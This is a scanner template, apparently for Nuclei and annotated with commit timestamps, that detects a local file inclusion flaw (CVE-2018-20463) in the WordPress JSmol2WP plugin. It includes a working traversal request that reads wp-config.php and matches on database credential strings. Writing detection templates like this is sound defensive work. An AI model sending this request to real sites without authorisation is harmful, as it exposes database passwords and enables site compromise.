2022-08-19 13:39:06 +00:00
id : CVE-2018-20463
info :
2023-04-03 19:28:01 +00:00
name : WordPress JSmol2WP <=1.07 - Local File Inclusion
2022-08-19 13:39:06 +00:00
author : vinit989
severity : high
description : |
2023-04-03 19:28:01 +00:00
WordPress JSmol2WP plugin 1.07 is susceptible to local file inclusion via ../ directory traversal in query=php://filter/resource= in the jsmol.php query string. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. This can also be exploited for server-side request forgery.
2022-08-19 13:39:06 +00:00
reference :
- https://wpscan.com/vulnerability/9197
2022-08-21 08:33:27 +00:00
- https://wordpress.org/plugins/jsmol2wp/
2023-04-12 14:25:04 +00:00
- https://github.com/sullo/advisory-archives/blob/master/wordpress-jsmol2wp-CVE-2018-20463-CVE-2018-20462.txt
2023-04-03 19:28:01 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2018-20463
2022-08-19 13:39:06 +00:00
classification :
2022-08-21 09:02:55 +00:00
cvss-metrics : CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score : 7.5
2022-08-19 13:39:06 +00:00
cve-id : CVE-2018-20463
2022-08-21 09:02:55 +00:00
cwe-id : CWE-22
2022-08-19 13:39:06 +00:00
metadata :
2023-04-28 08:11:21 +00:00
max-request : 1
2022-08-21 09:02:55 +00:00
verified : "true"
2022-08-27 04:41:18 +00:00
tags : wp,wp-plugin,wordpress,jsmol2wp,wpscan,cve,cve2018,traversal
2022-08-19 13:39:06 +00:00
2023-04-27 04:28:59 +00:00
http :
2022-08-19 13:39:06 +00:00
- method : GET
path :
- "{{BaseURL}}/wp-content/plugins/jsmol2wp/php/jsmol.php?isform=true&call=getRawDataFromDatabase&query=php://filter/resource=../../../../wp-config.php"
matchers-condition : and
matchers :
- type : word
part : body
words :
2022-08-21 08:33:27 +00:00
- "'DB_USER',"
- "'DB_PASSWORD'"
2022-08-19 13:39:06 +00:00
condition : and
- type : word
part : header
words :
- text/plain
- type : status
status :
- 200
2023-04-03 19:28:01 +00:00
# Enhanced by md on 2023/04/03